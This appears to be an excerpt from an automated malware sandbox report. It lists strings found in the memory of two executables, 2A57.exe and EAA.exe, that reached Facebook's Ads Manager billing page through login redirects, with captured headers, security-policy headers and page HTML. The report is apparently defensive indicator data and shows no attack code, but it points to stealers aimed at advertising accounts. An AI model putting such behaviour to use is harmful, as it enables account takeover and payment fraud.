Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: CELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:\/\/buy2.boku.com"]},4920],["BootloaderEndpointConfig",[],{"debugNoBatching":false,"endpointURI":"https:\/\/www.facebook.com\/ajax\/bootloader-endpoint\/"},5094],["CookieConsentIFrameConfig",[],{"consent_param":"FQASEhIA.ARYwnNKLDW0bAjniimmdEQD0-W4XhYOZM4oDcwHCWRtFB9xI","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},328],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u00 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comU/ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.647838153.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.570583469.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comog equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000003.560741420.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comuyy equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.625617363.00000000005DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Origin: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Origin: https://www.facebook.comRf equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Owww.facebook.comf equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: P\www.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: X-YsLoggerBlue","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"7197781313797005068"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7153952142819129718"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster5;v equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Xwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about cookies and how we use them, and review or change your choice at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Facebook Products. They\u2019re necessary for these sites to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">other companies\u003C\/a> for advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our servi],["_js_datr","n_FHY6nkgbnL7TwJr7T7egKP",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","n_FHY_IGNodBHcrJWk00PK3j",63072000000,"/",false,false,true]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoYzuQ"}}},hblp:{consistency:{rev:1006382194},rsrcMap:{"Yktk/RU":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/tuAGtaeF5Lw.js?_nc_x=Ij3Wp8lg5Kz"},zPYlTyl:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz"},wL2J9cL:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz"}},compMap:{TransportSelectingClientSingleton:{r:["Yktk/RU","07JSiP0"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["8zbEZtu","auB0bNr","/o5YvO2","ZEC4RrQ","XJ5NO10","dHsJQ6y","hKY0QKT","BIylKC4","ciHMngx","cYU3c32","n6W4xMH"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Yktk/RU"],be:1}}}},allResources:["8zbEZtu","zPYlTyl","wL2J9cL","XJ5NO10","/o5YvO2","h3ZzAmG","GpQFBwL","n6W4xMH","FY/FPFf","vGt2mxz","ZEC4RrQ","mRpDwmd","cYU3c32","BIylKC4","hKY0QKT"]});}));</script></body></html> equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.comd equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.642016530.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.comz equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.530168385.000000000085E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: `/Pwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: acebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u0025 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u0025KK equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: areers</a></li><li><a data-nocookies="1" href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn about your privacy and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad Choices.">Ad choices<i class="img sp_ot1t5YjYL3s sx_708a0f"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Contact Uploading &amp; Non-Users</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div><div class="mvl copyright"><div><span> Meta equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: elwww.facebook.comnal equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: fcebhttps://www.facebook.com/AAAAAAIAAA}Q equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: fwww.facebook.com f` equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hc\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"7197781313797005068"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7153952208847046505"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","ofFHY1PySQOY7kGdyUGK82_B",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","ofFHY7CMK_b7GQpGJOAZvD3H",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829 equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hp?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_z equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://www.facebook. equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/XQc equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647490629.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.530168385.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingCookiesW equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingN equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingO equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingnPxT equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingndex_meta_1 equals www.facebook.com (Facebook)
